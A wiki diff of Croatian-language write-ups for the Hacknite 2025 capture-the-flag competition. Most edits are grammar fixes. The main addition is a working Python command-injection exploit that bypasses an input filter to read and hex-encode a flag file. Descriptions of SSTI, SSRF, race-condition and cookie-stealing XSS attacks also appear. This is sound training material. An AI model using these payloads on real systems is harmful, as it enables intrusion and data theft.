Differences

This shows you the differences between two versions of the page.

--- hacknite2025 [2025/11/20 17:15] – mbunic
+++ hacknite2025 [2025/12/01 11:40] (current) – external edit 127.0.0.1
@@ Line 341: / Line 341: @@
 Ovo je ključni dio main funkcije, vidi se da program bilježi trenutačni timestamp, te ga potom postavlja kao user agent i šalje zahtjev na endpoint **http://chal.hacknite.hr:1556/get**, vraćeni odgovor pokreće kao shellcode.
-U ovom djelu koda se može vidjeti pod koji header se postavlja timestamp.
+U ovom dijelu koda se može vidjeti pod koji header se postavlja timestamp.
 <file>
@@ Line 359: / Line 359: @@
-Slanje trenutačnog timestampa je bitno, jer serverska strana može vračati drugačiji odgovor, ovisno o tome koji je timestamp u zahtjevu.
+Slanje trenutačnog timestampa je bitno, jer serverska strana može vraćati drugačiji odgovor, ovisno o tome koji je timestamp u zahtjevu.
 Za simulaciju ovog ponašanja može se napisati bash skripta koja šalje isti zahtjev i odgovor sprema u datoteku.
@@ Line 447: / Line 447: @@
-Ovaj program će ispisati adresu na koju s pomoću gdba trebamo postaviti breakpoint.
+Ovaj program će ispisati adresu na koju s pomoću alata gdb trebamo postaviti breakpoint.
 <file>
@@ Line 593: / Line 593: @@
-Kako bi se pronašao flag, može se samo ova hardkodirana vrijednost dešifrirati s RC4 algoritmom i ključem AWAVAUATSH. Ovo se može napraviti i alatom [[https://www.cert.hr/wp-content/uploads/2019/08/CyberChef.pdf|Cyberchef]].
+Kako bi se pronašao flag, može se samo ova hardkodirana vrijednost dešifrirati s RC4 algoritmom i ključem AWAVAUATSH. Ovo se može napraviti i alatom [[https://www.cert.hr/wp-content/uploads/2019/08/CyberChef.pdf|CyberChef]].
-{{ hacknite2025:rc4decrypt.png?nolink&500 | Cyberchef RC4 Decrypt }}
+{{ hacknite2025:rc4decrypt.png?nolink&500 | CyberChef RC4 Decrypt }}
@@ Line 617: / Line 617: @@
-Analizom koda vidi se da program pokušava otvoriti datoteku **"euler-enough-digits.txt"**, a ako datoteke nema, koristi fallback funkciju za generiranje znamenki broja e, no ova fallback funkcija ne generira dovoljno znamenki za ispravno enkodiranje. Zato ovaj zadatak krivo radi ako se pokreće bez datoteke **"euler-enough-digits.txt"** u kojoj je dovoljno znamenki broje e. Hint u zadatku kaže da je potrebno puno znamenki, u milijardama, te spominje y-cruncher, koji se može koristiti za generiranje potrebnih broja znamenki, kao i da postoje na [[https://archive.org/details/EulersNumberE7.5BillionDigits | internetu]].
+Analizom koda vidi se da program pokušava otvoriti datoteku **"euler-enough-digits.txt"**, a ako datoteke nema, koristi fallback funkciju za generiranje znamenki broja e, no ova fallback funkcija ne generira dovoljno znamenki za ispravno enkodiranje. Zato zadatak ne radi ispravno ako se pokreće bez datoteke **"euler-enough-digits.txt"** u kojoj je dovoljno znamenki broja e. Hint u zadatku kaže da je potrebno puno znamenki, u milijardama, te spominje y-cruncher, koji se može koristiti za generiranje potrebnih broja znamenki, kao i da postoje na [[https://archive.org/details/EulersNumberE7.5BillionDigits | internetu]].
@@ Line 909: / Line 909: @@
 </file>
-Samo računa pomak na status baru i prikazuje ga, ali na vrlo neefikasan i spor način. Uzevši u obzir da se ovo izvršava u petlji s 10368001 ponavljanja, potrebno vrijeme za izvršavanje ovog koda je neprihvatljivo.
+Samo računa pomak na status baru i prikazuje ga, ali na vrlo neefikasan i spor način. Uzevši u obzir da se ovo izvršava u petlji s 10368001 ponavljanja, potrebno vrijeme za izvršavanje ovog koda je neprihvatljivo dugo.
 <file>
@@ Line 928: / Line 928: @@
-Ovaj se kod može izvršiti u Pythonu i nakon što završi s računanjem, što ne bi trebalo trajati više od minute, ispisat će se flag.
+Ovaj se kod može izvršiti u Pythonu i nakon što završi s računanjem, što ne bi trebalo trajati više od minute, nakon čega će se ispisati flag.
 ====Poligloti====
@@ Line 963: / Line 963: @@
-Zato što izvršio dio datoteke nije stripped, reverzno inženjerstvo s pomoću Ghidra alata je puno lakše, nego što bi inače bilo.
+Zato što izvršni dio datoteke nije "stripped", reverzno inženjerstvo s alatom Ghidra je olakšano.
@@ Line 969: / Line 969: @@
-Može se vidjeti da traži te vrijednosti na određenom pomaku nakon byteova **"PK \x05 \x06"** Što je zapravo signature za kraj ZIP datoteke. Pošto je i sama ZIP datoteka pri kraju LorenIps datoteke, može se koristiti alat **xxd** i pogledati byteove pri kraju datoteke.
+Može se vidjeti da traži te vrijednosti na određenom pomaku nakon byteova **"PK \x05 \x06"** Što je zapravo signature za kraj ZIP datoteke. Budući da je i sama ZIP datoteka pri kraju LorenIps datoteke, može se koristiti alat **xxd** i pogledati byteove pri kraju datoteke.
 <file>
@@ Line 986: / Line 986: @@
-Sada samo treba pročitati ovu vrijednost, napraviti XOR kako bi se dobio AES ključ i iskoristiti ga zajedno sa postavljenim IV (lakše ga je pročitati iz flagEnc.bin, sa samog početka) za dekripciju enkriptirane flag datoteke.
+Sada je potrebno pročitati ovu vrijednost, napraviti XOR kako bi se dobio AES ključ i iskoristiti ga zajedno sa postavljenim IV (lakše ga je pročitati iz flagEnc.bin, sa samog početka) za dekripciju enkriptirane flag datoteke.
@@ Line 1163: / Line 1163: @@
-Pregledom Python koda u challenge.py datoteci, vidi se da je cijeli kod jedna duga obfuscirana linija koda. Ne koristi se uobičajena Python obfuskacija koju online deobfuskatori mogu pojednostaviti, nego naprednija, za koju je potrebna točno određena verzija Pythona definira u Dockerfileu.
+Pregledom Python koda u challenge.py datoteci, vidi se da je cijeli kod jedna duga obfuscirana linija koda. Ne koristi se uobičajena Python obfuskacija koju online deobfuskatori mogu pojednostaviti, nego naprednija, za koju je potrebna točno određena verzija Pythona definirana u Dockerfileu.
@@ Line 1488: / Line 1488: @@
 Kod za pronalazak skrivenog teksta u slici nije potrebno cijeli pisati, nego se može iskoristiti odgovarajući kod s navedenog GitHub projekta.
-Program pronalazi najčešću boju u slici, prema broju piksela koji imaju te iste R,G,B vrijednosti, onda u zadnji piksel (donji desni) pohranjuje duljinu poruke kao XOR nad duljinom poruke i najčešćim RGB vrijednostima (ovo se može i vizualno primijetiti, da zadnji piksel je drugačiji od okolnih)
+Program pronalazi najčešću boju u slici, prema broju piksela koji imaju te iste R, G, B vrijednosti, zatim u zadnji piksel (donji desni kut) pohranjuje duljinu poruke kao XOR nad duljinom poruke i najčešćim RGB vrijednostima (ovo se može i vizualno primijetiti, zadnji piksel se razlikuje od okolnih)
@@ Line 1656: / Line 1656: @@
 Kod generira 49 nasumičnih 30-znamenkastih heksadecimalnih brojeva (charset: 0–9 i a–f ASCII vrijednosti).
-Sadržaj datoteke flag.txt stavlja u jednu liniju i nasumično dodaje padding s lijeve i desne strane u istom charsetu, dok linija ne postane također dužine 30.
+Sadržaj datoteke flag.txt stavlja u jednu liniju i nasumično dodaje padding s lijeve i desne strane u istom charsetu, dok linija ne postane dužine 30, kao i ostale linije.
 Nakon toga su linije izmiješane i ciklično enkriptirane XOR-om s nasumično generiranim ključem dužine između 9 i 23 (ali dužina ključa nije djeljiva s 5). Ako je ključ dužine 22, u prvoj liniji će se koristiti cijeli ključ jednom i onda opet prva polovica ključa do 9. bajta, pa će sljedeća linija početi s 9. bajtom ključa, itd.
-Rješenje započinje pronalaskom dužine ključa, a zatim se određuje bajt ključa tako da svaki znak plaintexta koji je njime šifriran dekriptira u valjani znak iz charseta (0–9 + a–f).
+Rješenje započinje pronalaskom duljine ključa, a zatim se određuje bajt ključa tako da svaki znak plaintexta koji je njime šifriran dekriptira u valjani znak iz charseta (0–9 + a–f).
 Skripta je dana u nastavku.
@@ Line 1826: / Line 1826: @@
 </file>
-Gdje su X i Y konstante u programu, koje su iste za svije riječi.
+Gdje su X i Y konstante u programu, koje su iste za sve riječi.
@@ Line 1840: / Line 1840: @@
 Pri pronalasku korištene konfiguracije pomaka po riječi, što je konfiguracija bliža korištenoj, IC će biti veći. Kako bi se pronašla ispravna kombinacija X i Y pomaka po riječi, mogu se pokušati sve kombinacije.
-X i Y su nasumični integer u rasponu od 1 do broja znakova u rječniku, što je 38.
+X i Y su nasumični cijeli brojevi u rasponu od 1 do broja znakova u rječniku, što je 38.
 Broj mogućih kombinacija je time:
@@ Line 2717: / Line 2717: @@
 Python random modul koristi Mersenne Twister kao generator nasumičnih brojeva iz inicijalnog seeda.
-Pri početku koda se vidi kako je state inicijaliziran s punih 624 riječi, što je maximum.
+Pri početku koda se vidi kako je state inicijaliziran s punih 624 riječi, što je maksimum.
@@ Line 2883: / Line 2883: @@
 </file>
-Da je obrnuti redoslijed ovih dviju vrijednosti u signatureu:
+Da je redoslijed ovih dviju vrijednosti pri generaciji potpisa bio obrnut:
 <file>
@@ Line 2908: / Line 2908: @@
-Alat za generiranje produljenog sažetka koji se koristi u ovom rješenju je [[https://github.com/stephenbradshaw/hlextend|hlexstend]].
+Alat za generiranje produljenog sažetka koji se koristi u ovom rješenju je [[https://github.com/stephenbradshaw/hlextend|hlextend]].
@@ Line 3124: / Line 3124: @@
-Može se riješiti pisanjem odgovarajućeg CURL zahtjeva
+Zadatak se može riješiti pisanjem odgovarajućeg CURL zahtjeva.
 <file>
 curl -X POST "http://chal.platforma.hacknite.hr:14014/fetch_flag" \
@@ Line 3141: / Line 3142: @@
-odlaskom na
+Odlaskom na
 <file>
 http://chal.platforma.hacknite.hr:14015/docs/apidocs.txt
 </file>
-poruka je
+dobije se poruka
 <file>
@@ Line 3158: / Line 3160: @@
 </file>
-Vide se endpointovi, među kojima se vidi i endpoint
+Dostupan je pregled endpointova, među kojima se vidi i "flag" endpoint
 <file>
@@ Line 3168: / Line 3170: @@
-Tu se može vidjeti da se traženjem guest pristupa, šalje hash
+Može se vidjeti da se traženjem guest pristupa, šalje hash
 <file>
@@ Line 3183: / Line 3185: @@
 Unosom ovog hasha na [[ https://crackstation.net/ | crackstation]]
-vidi se da je ovo sha256 sažetak od teksta
+vidi se da je to SHA256 sažetak riječi:
 <file>
@@ Line 3236: / Line 3238: @@
 </file>
-Unosom poveznice interne lokacije na koju je premješten admin.html
+Unosom poveznice interne lokacije na koju je premješten admin.html, vraća se greška da se točke ne prihvaćaju u hostnameu.
-Vraća se greška da se točke ne prihvaćaju u hostnameu.
+IP adresa se može zapisati u oktalnom zapisu, gdje nema točaka.
-IP adresa se može zapisati u oktalnom zapisu, u kojem nema točaka.
 Za ovo postoji web [[https://www.browserling.com/tools/ip-to-oct | konverter IP adrese u oktalni zapis]].
-Rezultat konvertiranja localhost (127.0.0.1) adrese u oktalnu bez točaka je:
+Rezultat konverzije localhost (127.0.0.1) adrese u oktalni format bez točaka je:
 <file>
@@ Line 3252: / Line 3252: @@
 </file>
-Ovime se može riješiti zadatak
+Ovime je zadatak riješen.
 <file>
@@ Line 3268: / Line 3268: @@
 Uz zadatak je dan i izvorni kod zadatka.
-Ovaj zadatak ima [[race condition | Race condition]] ranjivost, gdje skripta koja se učitala, čak i ako ju server ocijeni opasnom i odluči obrisati, i dalje može izvršiti ako se zahtjev za izvršavanje skripte pošalje odmah nakon što se skripta učita.
+Ovaj zadatak ima ranjivost tipa [[race condition | Race condition]], gdje se skripta koja se učitala, čak i ako ju server ocijeni opasnom i odluči obrisati, i dalje može izvršiti ako se zahtjev za izvršavanje skripte pošalje odmah nakon što se skripta učita.
 Skripti se ime datoteke pri učitavanju pretvori u sha256 sažetak imena skripte s dodanom ekstenzijom .py. Skripte se pokreću preko endpointa
@@ Line 3277: / Line 3277: @@
-Ako se napravi skripta koja će učitati skriptu koja čita flag, te odmah nakon toga poslati zahtjev za izvršavanje te skripte na opisani endpoint, može se ostvariti izvršavanje skripte i iščitati rezultat izvršavanja.
+Ako se kreira skripta koja uploada skriptu za čitanje flaga i odmah nakon toga pošalje zahtjev za njeno izvršavanje na opisani endpoint, uploadana skripta će se izvršiti i flag će se pročitati i biti ispisan.
@@ Line 3417: / Line 3417: @@
 Ranjivost ovog zadatka je [[ssti|SSTI]].
-Python kod unesen preko "session_id" kolacija se može izvršiti pri renderu jinja2 templatea, ako se stavi unutar oznaka duplih vitičastih zagrada. Kod unutar tog kolačića se može izvršiti samo pri prikazu poruke greške, koja je javlja pri neispravnom "session" kolačiću.
+Python kod unesen preko 'session_id' kolačića može se izvršiti prilikom renderiranja Jinja2 templatea, ako se stavi unutar oznaka duplih vitičastih zagrada. Kod unutar tog kolačića se može izvršiti samo pri prikazu poruke greške, koja je javlja pri neispravnom "session" kolačiću.
 Oblik payload kolačića je:
@@ Line 3427: / Line 3428: @@
-Nakon uspješne potvrde pokretanja koda,potrebno je korištenjem MRO-a pronaći dostupne module i funkcije kojima se može pročitati flag, te ih iskoristiti.
+Nakon potvrde izvršenja koda, potrebno je korištenjem MRO-a pronaći dostupne module i funkcije kojima se može pročitati flag, te ih iskoristiti.
 Skripta koja radi opisano, analizira dostupne module i koristi za čitanje flaga je dana u nastavku.
@@ Line 3562: / Line 3563: @@
 </file>
-što čini ovaj zadatak blind, jer odgovor svakog upita mora biti broj između 0 i 4.
+To čini zadatak "blind", jer je odgovor svakog upita broj između 0 i 4, koji se potom mapira na znak iz skupa A–F.
@@ Line 3762: / Line 3763: @@
 </file>
-Greška u implementaciji je u načinu kako funkcija podnosi invalid bajt, ako naiđe na invalid bajt, preskače se ta iteracija petlje s **continue** statementom, čime će se preskočiti inkrementiranje **$copyIdx** indeksa, dok će indeks **$i** biti uvećan.
+Greška u implementaciji se nalazi u načinu na koji funkcija obrađuje invalid bajt. Ako naiđe na invalid bajt, preskače se ta iteracija petlje s **continue** statementom, čime će se preskočiti inkrementiranje **$copyIdx** indeksa, dok će indeks **$i** biti uvećan.
@@ Line 3822: / Line 3823: @@
 Korisnički unos dan preko stranice se na nesiguran način izvršava kao bash naredba s pomoću subprocess modula.
-Zadatak ima filter na ulazu, kojim su zabranjeni određeni unosi, te validaciju na prije povratka rezultata izvršene komande, da rezultat izvršavanja mora odgovarati sha265 regexu.
+Zadatak ima filter na ulazu, koji zabranjuje određene unose, te provjeru rezultata izvršene komande, gdje rezultat izvršavanja mora odgovarati SHA256 regexu.
-Zadatak se može riješiti na više načina, nakon Što se pronađe način za napraviti command injection koji uspješno prolazi kroz filter, pročitana flag datoteka se ili može eksfiltrirati preko request basketa, ili se može mapirati na hex charset i paddat da odgovara sha256 regexu, ili se mogu izvršavati blind upiti, gdje su pitanja npr. u obliku "ako je tvrda točna vrati sha256(1), ako je tvrdnja netočna vrati sha256(0), kao Što je u skripti rješenja zadatka.
+Zadatak se može riješiti na više načina, nakon što se pronađe način za napraviti command injection koji uspješno prolazi kroz filter, pročitana flag datoteka se ili može eksfiltrirati preko request basketa, ili se može mapirati na hex charset i dopunit da odgovara SHA256 regexu, ili se mogu izvršavati blind upiti, gdje su pitanja npr. u obliku "ako je tvrda točna vrati sha256(1), ako je tvrdnja netočna vrati sha256(0), kao što je u skripti rješenja zadatka.
-Također se zadatak može riješiti i crackanjem vraćenog sha256 hasha unutar kojega je i vraćen flag, di je jedini nepoznati dio 12 znamenki korištenjem alata hashcat, ako hashcat ima zadovoljavajuć hashrate i koristi grafičku karticu, pa može pretražiti prostor u prihvatljivom vremenu.
+Također se zadatak može riješiti i crackanjem vraćenog SHA256 hasha unutar kojega je i vraćen flag, gdje je jedini nepoznati dio 12 znamenki flaga. Korištenjem alata hashcat, ako hashcat ima zadovoljavajuć hashrate i koristi grafičku karticu, može se pretražiti nepoznati prostor u prihvatljivom vremenu.
-Skripta koja rješava zadatak s pomoću blind upita je u nastavku.
+Skripta koja rješava zadatak korištenjem Pythona i enkodiranjem flaga u hex.
+<file>
+import requests
+import binascii
+# CONFIGURATION
+URL = "http://chal.platforma.hacknite.hr:14017/hash"
+def decode_response(hex_string):
+    try:
+        decoded_bytes = binascii.unhexlify(hex_string)
+        return decoded_bytes.decode('utf-8', errors='ignore')
+    except Exception as e:
+        return f"Decoding Error: {e}"
+def solve():
+    print("[*] Constructing Payload...")
+    # 1. Generate the number 1 (for 'head -n 1')
+    # logic: count 'a' -> 1
+    one_gen = "one=$(printf a|wc -c);"
+    # 2. Generate the number 64 (for final truncation)
+    # logic: 64 'a's count
+    a_64 = 'a' * 64
+    len_gen = f"len=$(printf {a_64}|wc -c);"
+    # 3. Locate Python binary without using '3'
+    # 'ls /usr/local/bin/python?' matches '/usr/local/bin/python3'
+    # We pipe to 'head -n $one' to ensure we get just one line/binary
+    find_py = "py=$(ls /usr/local/bin/python?|head -n $one);"
+    # 4. Python One-Liner
+    # Reads stdin, strips whitespace, encodes to hex.
+    # No digits or blacklisted words used here.
+    py_cmd = "import sys;print(sys.stdin.read().strip().encode().hex())"
+    # 5. Construct the full pipeline
+    # head f* -> Read flag
+    # $py -c ... -> Hex encode it using the found python binary
+    # tr -d '\n' -> Safety cleanup (though .strip() does most work)
+    raw_gen = f"raw=$(head f*|$py -c '{py_cmd}'|tr -d '\\n');"
+    # 6. Padding Logic (same as before)
+    pad_str = 'a' * 64
+    # 7. Combine and Print
+    cmd_logic = (
+        f"{one_gen}"
+        f"{len_gen}"
+        f"{find_py}"
+        f"{raw_gen}"
+        f"pad={pad_str};"
+        f"combined=$raw$pad;"
+        f"printf %s $combined|head -c $len"
+    )
+    payload = f"' ; {cmd_logic} ; #"
+    print(f"[*] Payload: {payload}")
+    json_data = {"user_input": payload}
+    try:
+        res = requests.post(URL, json=json_data, timeout=10)
+        response = res.json()
+        if response.get("success"):
+            returned_hash = response.get("hash", "")
+            print(f"[*] Server returned: {returned_hash}")
+            decoded = decode_response(returned_hash)
+            print("="*50)
+            print(f"[*] DECODED OUTPUT: {decoded}")
+            print("="*50)
+        else:
+            print(f"[-] Server reported failure: {response.get('error')}")
+    except Exception as e:
+        print(f"[!] Connection error: {e}")
+if __name__ == "__main__":
+    solve()
+</file>
+Skripta koja rješava zadatak korištenjem Basha i generiranjem blind upita.
 <file>
@@ Line 3915: / Line 4003: @@
 print(f"Exploit finished. Final Flag: {known_flag}")
 </file>
@@ Line 3929: / Line 4018: @@
 Ranjivost u ovom zadatku je [[xss napadi |XSS]].
-U zadatku je potrebno konstruirati prototype pollution XSS napad nad stranicom, ali postavljanjem HOST vrijednosti u  "localhost" i postavljenjem PORT vrijednosti u 5000 (zadnja linija **app.py**, slično kao SSRF) umjesto URL-a stranice, kako bi admin bot koristio svoj cookie pri posjeti stranice, te potom JavaScript kodom u XSS-u se treba adminov cookie pročitati i poslati na vlastiti request basket.
+U zadatku je potrebno konstruirati prototype pollution XSS napad nad stranicom. HOST se treba postaviti u  "localhost", a PORT u 5000 (zadnja linija **app.py**) umjesto URL-a stranice (sličan pristup kao kod SSRF-a), kako bi admin bot koristio svoj cookie pri posjetu stranice. Potom JavaScript kodom u XSS-u treba adminov cookie pročitati i poslati na vlastiti request basket.
@@ Line 3991: / Line 4080: @@
 No pri pokušaju otvaranja ovog kao slike, vraćena je greška da je file signature nepoznat ili neispravan.
-naredbom **file** nad datotekom ili **binwalk**, vidi se po odgovori da nije prepoznat file signature, kao ni ručnom inspekcijom pomoću alata **xxd**.
+naredbom **file** nad datotekom ili **binwalk**, vidi se iz odgovora da nije prepoznat file signature, kao ni ručnom inspekcijom pomoću alata **xxd**.
-Zapravo je i sadržaj same datoteke izokrenut unazad, kao što je i ime datoteke. Pitanje je jesu li bajtovi izokrenuti unazad ili bitovi. Da su bajtovi izokrenuti unazad, na početku datoteke bi bili GNP bajtovi, no to nije slučaj.
+Zapravo je i sadržaj same datoteke napisan unazad, kao što je i ime datoteke. Pitanje je jesu li bajtovi ili bitovi okrenuti unazad. Da su bajtovi izokrenuti, na početku datoteke bi bili GNP bajtovi, no to nije slučaj.
@@ Line 4054: / Line 4143: @@
-Ovaj efekt se može napraviti unazad, ili alatom kao što je GIMP ili Photoshop ili [[ https://www1.lunapic.com/editor/?action=swirl | online alatom]].
+Ovaj efekt se može napraviti u suprotnom smjeru, ili alatom kao što je GIMP ili Photoshop ili [[ https://www1.lunapic.com/editor/?action=swirl | online alatom]].
 Unosom vrijednosti za swirl amount -700, dobiva se jasno vidljiv flag.
@@ Line 4078: / Line 4167: @@
-Nakon ekstrakcije, pozicioniranjem u isti direktorij kao i slika, može se napraviti mount, negdje u korisnički user direktorij.
+Nakon ekstrakcije, potrebno je pozicionirati se u isti direktorij kao i slika i napraviti mount negdje u korisnički direktorij.
 <file>
@@ Line 4119: / Line 4208: @@
-Sam LUKS alat također nije enkriptiran, jer je on upravo zaslužan za dekripciju datotečnog sustav, zato ga je dobro provjeriti za postojanje nekog backdoora, kao što je spomenuto u tekstu zadatka. Kako bi se LUKS provjerio, potrebno je pregledati initrd (initial RAMdisk, za vrijeme boota se koristi), srećom dostupan je i initrd backup.
+Sam LUKS alat također nije enkriptiran, jer je on upravo zaslužan za dekripciju datotečnog sustava, zato ga je dobro provjeriti za postojanje nekog backdoora, kao što je spomenuto u tekstu zadatka. Kako bi se LUKS provjerio, potrebno je pregledati initrd (initial RAMdisk, za vrijeme boota se koristi), srećom dostupan je i initrd backup.
 <file>
@@ Line 4135: / Line 4224: @@
 </file>
-Sa binwalk se može napravit extract initrd i initrd backupa.
+S binwalk alatom se može napraviti extract initrd i initrd backupa.
 <file>
@@ Line 4165: / Line 4254: @@
 **cpio** extract nema opciju odabira output direktorija.
-Sada je cilj napraviti ekstrakt svih .cpio arihiva iz initrd i iz initrd.bak, te ih međusobno usporediti.
+Sada je cilj napraviti ekstrakt svih .cpio arhiva iz initrd i iz initrd.bak, te ih međusobno usporediti.
 <file>
@@ Line 4186: / Line 4275: @@
 </file>
-Sada su svi cpio arhivi raspakirani i sve datoteke u initrd i initrd backupu su dostupne za analizu,može napraviti analiza datoteka koje postoje u jednom a ne u drugom, kao i razlike unutar samih datoteka, naredbom **diff**.
+Sada su svi cpio arhivi raspakirani i sve datoteke u initrd i initrd backupu su dostupne za analizu,može napraviti analiza datoteka koje postoje u jednom, a ne u drugom, kao i razlike unutar samih datoteka, naredbom **diff**.
@@ Line 4281: / Line 4370: @@
-Nakon ekstrakcija datoteke, potrebno je napraviti  mount QCOW2 slike.
+Nakon ekstrakcije datoteke, potrebno je napraviti  mount QCOW2 slike.
 Za to je potreban paket **qemu-utils**
@@ Line 4336: / Line 4425: @@
-U direktoriju ovog korisnika, jedni od zanimljivijih datoteka su **places.sqlite** i **places.sqlite-wal** (iako je u ovom slučaju prazan, sve iz njega je već zapisano u places.sqlite), koji zapisuju određene podatke o posjećenim stranicama
+U direktoriju ovog korisnika, neke od zanimljivijih datoteka su **places.sqlite** i **places.sqlite-wal** (iako je u ovom slučaju prazan, sve iz njega je već zapisano u places.sqlite), koji zapisuju određene podatke o posjećenim stranicama
 <file>
@@ Line 4352: / Line 4441: @@
-Vidi se da ima više zabilježenih zapisa o stranici [[https://wplace.live/|wplace]], gdje korisnici mogu bojati piksele na mapi svijeta. No, kada se šalje zahtjev za postavljanje piksela, to se radi POST zahtjevom, a POST zahtjeve web preglednika ne bilježe, iako bilježe iznenađujuće puno drugih stvari...
+Vidi se da ima više zabilježenih zapisa o stranici [[https://wplace.live/|wplace]], gdje korisnici mogu bojiti piksele na mapi svijeta. No, kada se šalje zahtjev za postavljanje piksela, to se radi POST zahtjevom, a web preglednici u pravilu ne bilježe POST zahtjeve, iako bilježe iznenađujuće puno drugih stvari.
-No ostalo je još nešto zanimljivo na među datotekama a to je [[https://www.cert.hr/wp-content/uploads/2018/11/owasp_zap.pdf| ZAP]].
+Među datotekama se nalazi još nešto zanimljivo, to je [[https://www.cert.hr/wp-content/uploads/2018/11/owasp_zap.pdf| ZAP]].
 <file>
@@ Line 4581: / Line 4670: @@
 A vrijednost **a** se postavlja kao zadnji uneseni broj. **scanf** vraća broj pravilno upisanih formata, što znači da je potrebno upisati 5 brojeva, kako bi scanf vratio 5 i kako bi se onda izazvalo pozivanje slučaja 5.
-Format rješenja je 5 unesenih brojeva, od kojih zadnji broj ima potavljeni 18. bit s lijeva u 1.
+Format rješenja je unos 5 brojeva, od kojih zadnji broj mora imati 18. bit slijeva postavljen na 1.
 ...xx**1**xxxxxxxxxxxxxxxxx
@@ Line 4643: / Line 4732: @@
 Uz zadatak je dan i izvorni kod.
-Pregledom koda, može se vidjeti da postoji unsigned integer underflow, koji će u slučaju da score postane -1, zbog underflowa postaviti score u najveći mogući, te će odmah biti zadovoljen uvjet dovoljno visokog scorea za upis imena.
+Pregledom koda, može se vidjeti da postoji unsigned integer underflow, koji će u slučaju da score postane -1, zbog underflowa biti postavljen na najveću moguću vrijednost. Time će odmah biti zadovoljen uvjet dovoljno visokog scorea za upis imena.
 U funkciji za upis imena se nalazi [[ret2win|Ret2win]] ranjivost.
@@ Line 4659: / Line 4748: @@
-Ovdje se funkcijom **gets** čita neograničen korisnički unos u buffer veličine 32 bajta. Može se prepisati adresa povratka, da se funkcija nakon povratka ne vrati u main, nego na početak izvršavanja funkcije **easter_egg** koja ispisuje flag.
+Ovdje se funkcijom **gets** čita neograničen korisnički unos u buffer veličine 32 bajta. Adresa povratka se može prepisati preko buffer overflowa, tako da se funkcija nakon povratka ne vrati u main, nego na početak izvršavanja funkcije **easter_egg**, koja ispisuje flag.
 <file>
@@ Line 4880: / Line 4969: @@
 Uz zadatak je dan i izvorni kod.
-Rješenje ovog zadatka se temelji na ROP gadgetu kojim se poziva shell, pretraživanjem i sastavljanjem odgovarajućih elemenata iz glibc shared objecta.
+Rješenje ovog zadatka se temelji na ROP gadgetu kojim se poziva shell, pretraživanjem i sastavljanjem odgovarajućih elemenata iz glibc shared libraryja.
 Rješenje zadatka je u nastavku.
@@ Line 4927: / Line 5016: @@
-Rješenje ovog zadatka je drugačije od drugih zadataka pisanih u C programskom jeziku, temelji se na [[ret2win|Ret2win]], prepisivanju adrese i sadržaja virtualne tablice i string pointera.
+Rješenje ovog zadatka je drugačije od drugih zadataka pisanih u C programskom jeziku, temelji se na [[ret2win|Ret2win]], prepisivanju adrese i sadržaja virtualna tablica funkcija (vtable) te string pointera.
-Predzadnji upit u zadatku (**Ime i prezime>**) ima buffer overflow, kojime se treba u objektu mačka koji je na stogu iznad objekta kupac kojemu se upisuje ime i prezime, prepisati string pointer varijable naziv i prepisati pointer na virtualni tablicu funkcija da pokazuju oboje na istu adresu, koja je u .bss sekciji, na dijelu sekcije gdje nije ništa za što bi program prestao funkcionirati kad bi bilo prepisano (kao stdout npr).
+Predzadnji upit u zadatku (**Ime i prezime>**) ima buffer overflow, kojim se treba u objektu mačka koji je na stogu iznad objekta kupac kojemu se upisuje ime i prezime, prepisati string pointer varijable naziv i prepisati pointer na virtualnu tablicu funkcija da oboje pokazuju na istu adresu, koja je u .bss sekciji, na dijelu sekcije gdje nije ništa za što bi program prestao funkcionirati kad bi bilo prepisano (kao stdout npr).
 Sada kada je prepisana adresa string varijable naziv u objektu mačka (za prvi odabir uzeti 1 - mačka), zadnji unos je upravo unos naziva ljubimca, odnosno zadnji unos će se pohraniti na adresu na koju prepisana string varijabla naziv pokazuje.
@@ Line 4937: / Line 5026: @@
-Sada je preostalo za zadnji unos upisati adresu funkcije **ret2win**, kako bi se adresa te funkcije preko prepisane adrese varijable naziv upisala u .bss sekciju i onda će se pri pozivu **z->zvuk();**, preko prepisane adrese virtualne tablice koja pokazuje na isto mjesto, umjesto funkcije zvuk, pozvati funkcija ret2win.
+Preostalo je za zadnji unos upisati adresu funkcije **ret2win**, kako bi se adresa te funkcije preko prepisane adrese varijable naziv upisala u .bss sekciju i onda će se pri pozivu **z->zvuk();**, preko prepisane adrese virtualne tablice koja pokazuje na isto mjesto, umjesto funkcije zvuk, pozvati funkcija ret2win.
@@ Line 4979: / Line 5068: @@
 Uz zadatak je dan i izvorni kod zadatka.
-Potrebno je zabilježiti ispise programa, i iz njih izračunati inicijalni broj dan programu, prema kojemu su određena brzina i početna pozicija sata.
+Potrebno je zabilježiti ispise programa, i iz njih izračunati inicijalni broj koji je dan programu, prema kojemu su određena brzina i početna pozicija sata.
 Mogu se zabilježiti prve dvije pozicije i jedna puno kasnija pozicija za izračun parametara.
@@ Line 5081: / Line 5170: @@
-Tehnika ovog rješenja je slična kao [[blind_sqli|Blind SQL injection]], no nema baze podataka nad kojom se šalju upiti, nego je tehnika upita bazirana na istom principu. FLAG varijabla je unutar samog sandbox okruženja koje jedino vraća odgovor je li se kod uspješno izvršio ili nije. Rješenje je ostvareno izvršavanjem Python koda nad FLAG varijablom oblika "Ako je tvrdnja točna, nemoj baciti grešku, ako je tvrdnja netočna, baci grešku" ili obrnuto (kao što je u skripti).
+Tehnika ovog rješenja je slična kao [[blind_sqli|Blind SQL injection]], no nema baze podataka nad kojom se šalju upiti, nego je tehnika upita bazirana na istom principu. FLAG varijabla je unutar samog sandbox okruženja, koje jedino vraća odgovor je li se kod uspješno izvršio ili nije. Rješenje je ostvareno izvršavanjem Python koda nad FLAG varijablom u obliku: "Ako je tvrdnja točna, nemoj baciti grešku, ako je tvrdnja netočna, baci grešku" ili obrnuto (kao što je u skripti).
@@ Line 5159: / Line 5248: @@
 Program se može napisati u Pythonu, ili u C-u ili Rustu, u kojem slučaju je skripta puno brža nego ako je napisana Pythonom.
-Python skripta se može pokrenuti s "pypy" implementacijom Pythona, u kojem slučaju će se skripta značajno ubrzati.
+Python skripta se može pokrenuti s "pypy" implementacijom Pythona, u kojem slučaju će se skripta značajno brže izvršavati.
 <file>
@@ Line 5165: / Line 5254: @@
 </file>
-u nastavku je dana Python skripta koja pronalazi validno rješenje ovih uvjeta, koja je kompatibilna s pypy implementacijom. Skripta koristi bruteforce pristup s backtrack algoritmom, bez heuristika. Moguće je napisati skriptu koja koristi prikladne heuristike i puno brže pronalazi validnu konfiguraciju rješenja.
